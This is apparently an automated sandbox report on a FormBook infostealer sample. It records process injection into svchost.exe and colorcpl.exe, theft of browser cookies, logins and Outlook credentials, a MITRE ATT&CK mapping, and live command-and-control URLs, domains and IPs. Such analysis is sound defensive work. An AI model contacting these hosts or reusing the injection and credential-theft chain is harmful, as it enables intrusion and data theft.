Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread register set: target process: 8176

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe

Thread APC queued: target process: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 5B3008

Jump to behavior

Source: C:\Users\user\Desktop\New order BPD-003777.exe

0_2_0029F98E

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New order BPD-003777.exe"	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002E1663

Source: New order BPD-003777.exe, 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: New order BPD-003777.exe, xTzxorEdKnFN.exe, 00000005.00000000.2199126110.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629369111.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629826049.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xTzxorEdKnFN.exe, 00000005.00000000.2199126110.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629369111.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629826049.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: xTzxorEdKnFN.exe, 00000005.00000000.2199126110.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629369111.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629826049.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: xTzxorEdKnFN.exe, 00000005.00000000.2199126110.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629369111.0000000001170000.00000002.00000001.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629826049.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002A0698 cpuid

0_2_002A0698

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002A0A9D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_002A0A9D

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002842DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3629802561.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3629846283.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3628819504.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272300484.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2272460449.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2276142415.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3629829522.0000000003310000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	412 Process Injection	12 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	412 Process Injection	21 Input Capture	231 Security Software Discovery	Remote Desktop Protocol	21 Input Capture	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	3 Process Discovery	Distributed Component Object Model	1 Data from Local System	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	115 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New order BPD-003777.exe	39%	Virustotal		Browse
New order BPD-003777.exe	50%	ReversingLabs	Win32.Trojan.Generic
New order BPD-003777.exe	100%	Avira	DR/AutoIt.Gen8
New order BPD-003777.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS8kP4gBJ8eOTYb+e2w2GS9Rfuczm284n9HscOXcNPb7iGn3oZX2z0bs=&-HT0=eZZx0LUhp4u8Nb7	0%	Avira URL Cloud	safe
http://www.buildfuture.website/brgm/?-HT0=eZZx0LUhp4u8Nb7&PZtTT8P0=zZBAurvGVFID4gQja6K5puo946UQMWfD5PMg/RgwWhmYguwOMej1h7bKFXAKsHPKzWTIbqUmzdTnclHnVVtC51fb9z47H8HhLLvcw9Akuk8AFxTwcor1860=	0%	Avira URL Cloud	safe
http://www.jackys.shop/tc4z/	0%	Avira URL Cloud	safe
http://www.6hcwz.info	0%	Avira URL Cloud	safe
http://www.cikolatasampuan.xyz/sbv2/?PZtTT8P0=KCOXl4L0MjZtpt9om/tmYw0VttOad0yMCs4OQKkXNc8VH0itCYxOihExehlokU3aZEnUGvFTmMELvqtU+Kox5tVgQ7KRBTJUg1vzgVjJ1xaulaVtzEKyyvI=&-HT0=eZZx0LUhp4u8Nb7	100%	Avira URL Cloud	malware
http://www.l33900.xyz/t4o7/?PZtTT8P0=uJKBo1tKDv7YsektomxAe6xLUzKhSocRURbZYBlCa5gveKZ37rsA10kLqgKMu7eO65AngIyj7yeUeCYZeYghmIfm5PSli+U+Ur1GTnr4eXI8Tij3papz9cQ=&-HT0=eZZx0LUhp4u8Nb7	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7	0%	Avira URL Cloud	safe
http://www.blockconnect.tech/yrw8/	0%	Avira URL Cloud	safe
http://www.cikolatasampuan.xyz/sbv2/	100%	Avira URL Cloud	malware
http://www.buildfuture.website/brgm/	0%	Avira URL Cloud	safe
http://www.blockconnect.tech/yrw8/?PZtTT8P0=RFR6bYZjT9m40Qm+zbryzANOuUFT5Vwsrp8mJhbrSqaa0hAU+0NzQA7l3HeOPbt8HBkBLiHPDpxMijTsjbxyiMcdqRih2VgGUZM/FBv+f3nAi4b7MCsEdgs=&-HT0=eZZx0LUhp4u8Nb7	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMK	0%	Avira URL Cloud	safe
http://www.accusolution.pro/s4sk/?PZtTT8P0=w1z0LxExs9MXILOhkTw/05qIOC9wPz9pW67ass2TZN6sDGg0GyeGaAU8sMVSePVNOj9ELn/nlJfz7v0haQuSr/gZC77LrnvOb7BfL6JpYx8NJq7/9PXIC+k=&-HT0=eZZx0LUhp4u8Nb7	100%	Avira URL Cloud	malware
http://www.100millionjobs.africa/bdcw/	0%	Avira URL Cloud	safe
http://www.6hcwz.info/vslm/	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/	0%	Avira URL Cloud	safe
http://www.l33900.xyz/t4o7/	0%	Avira URL Cloud	safe
http://www.accusolution.pro/s4sk/	100%	Avira URL Cloud	malware
http://cikolatasampuan.xyz/	100%	Avira URL Cloud	malware
https://jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS	0%	Avira URL Cloud	safe
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/	0%	Avira URL Cloud	safe
http://www.6hcwz.info/vslm/?PZtTT8P0=zC4zMG0SLXGKoOyqUI5Abkx/PzoLDn/S8PthLULLwKSzNefTy4ZudJoNt3Kk74AgS/gmI7rmIyltTNtABG2sKNdnUxIQu/0toq2WPl2/BEOTqysptoicMx8=&-HT0=eZZx0LUhp4u8Nb7	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.l33900.xyz	162.218.30.235	true	true	unknown
mraber.dev	46.38.243.234	true	true	unknown
www.6hcwz.info	172.67.183.191	true	true	unknown
www.jackys.shop	217.160.0.207	true	true	unknown
www.buildfuture.website	162.0.236.169	true	true	unknown
accusolution.pro	185.68.108.243	true	true	unknown
100millionjobs.africa	136.243.64.147	true	true	unknown
www.cikolatasampuan.xyz	104.21.32.1	true	true	unknown
www.blockconnect.tech	13.248.169.48	true	true	unknown
www.100millionjobs.africa	unknown	unknown	false	unknown
www.mraber.dev	unknown	unknown	false	unknown
www.accusolution.pro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.100millionjobs.africa/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: safe	unknown
http://www.jackys.shop/tc4z/	true	Avira URL Cloud: safe	unknown
http://www.cikolatasampuan.xyz/sbv2/	true	Avira URL Cloud: malware	unknown
http://www.cikolatasampuan.xyz/sbv2/?PZtTT8P0=KCOXl4L0MjZtpt9om/tmYw0VttOad0yMCs4OQKkXNc8VH0itCYxOihExehlokU3aZEnUGvFTmMELvqtU+Kox5tVgQ7KRBTJUg1vzgVjJ1xaulaVtzEKyyvI=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: malware	unknown
http://www.l33900.xyz/t4o7/?PZtTT8P0=uJKBo1tKDv7YsektomxAe6xLUzKhSocRURbZYBlCa5gveKZ37rsA10kLqgKMu7eO65AngIyj7yeUeCYZeYghmIfm5PSli+U+Ur1GTnr4eXI8Tij3papz9cQ=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: safe	unknown
http://www.jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS8kP4gBJ8eOTYb+e2w2GS9Rfuczm284n9HscOXcNPb7iGn3oZX2z0bs=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: safe	unknown
http://www.buildfuture.website/brgm/?-HT0=eZZx0LUhp4u8Nb7&PZtTT8P0=zZBAurvGVFID4gQja6K5puo946UQMWfD5PMg/RgwWhmYguwOMej1h7bKFXAKsHPKzWTIbqUmzdTnclHnVVtC51fb9z47H8HhLLvcw9Akuk8AFxTwcor1860=	true	Avira URL Cloud: safe	unknown
http://www.buildfuture.website/brgm/	true	Avira URL Cloud: safe	unknown
http://www.blockconnect.tech/yrw8/	true	Avira URL Cloud: safe	unknown
http://www.blockconnect.tech/yrw8/?PZtTT8P0=RFR6bYZjT9m40Qm+zbryzANOuUFT5Vwsrp8mJhbrSqaa0hAU+0NzQA7l3HeOPbt8HBkBLiHPDpxMijTsjbxyiMcdqRih2VgGUZM/FBv+f3nAi4b7MCsEdgs=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: safe	unknown
http://www.l33900.xyz/t4o7/	true	Avira URL Cloud: safe	unknown
http://www.6hcwz.info/vslm/	true	Avira URL Cloud: safe	unknown
http://www.accusolution.pro/s4sk/?PZtTT8P0=w1z0LxExs9MXILOhkTw/05qIOC9wPz9pW67ass2TZN6sDGg0GyeGaAU8sMVSePVNOj9ELn/nlJfz7v0haQuSr/gZC77LrnvOb7BfL6JpYx8NJq7/9PXIC+k=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: malware	unknown
http://www.accusolution.pro/s4sk/	true	Avira URL Cloud: malware	unknown
http://www.100millionjobs.africa/bdcw/	true	Avira URL Cloud: safe	unknown
http://www.6hcwz.info/vslm/?PZtTT8P0=zC4zMG0SLXGKoOyqUI5Abkx/PzoLDn/S8PthLULLwKSzNefTy4ZudJoNt3Kk74AgS/gmI7rmIyltTNtABG2sKNdnUxIQu/0toq2WPl2/BEOTqysptoicMx8=&-HT0=eZZx0LUhp4u8Nb7	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.6hcwz.info	xTzxorEdKnFN.exe, 00000007.00000002.3628819504.0000000000873000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://maximumgroup.co.za/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMK	xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000303A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/	colorcpl.exe, 00000006.00000002.3630401859.0000000005BBC000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.00000000031CC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS	colorcpl.exe, 00000006.00000002.3630401859.0000000005898000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.0000000002EA8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cikolatasampuan.xyz/	xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000335E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/	colorcpl.exe, 00000006.00000002.3630401859.0000000005BBC000.00000004.10000000.00040000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.00000000031CC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	colorcpl.exe, 00000006.00000002.3632441933.0000000007D5B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.blockconnect.tech	United States	16509	AMAZON-02US	true
104.21.32.1	www.cikolatasampuan.xyz	United States	13335	CLOUDFLARENETUS	true
217.160.0.207	www.jackys.shop	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
136.243.64.147	100millionjobs.africa	Germany	24940	HETZNER-ASDE	true
162.218.30.235	www.l33900.xyz	United States	62587	ANT-CLOUDUS	true
185.68.108.243	accusolution.pro	Spain	201446	PROFESIONALHOSTINGES	true
172.67.183.191	www.6hcwz.info	United States	13335	CLOUDFLARENETUS	true
162.0.236.169	www.buildfuture.website	Canada	22612	NAMECHEAP-NETUS	true
46.38.243.234	mraber.dev	Germany	197540	NETCUP-ASnetcupGmbHDE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592115
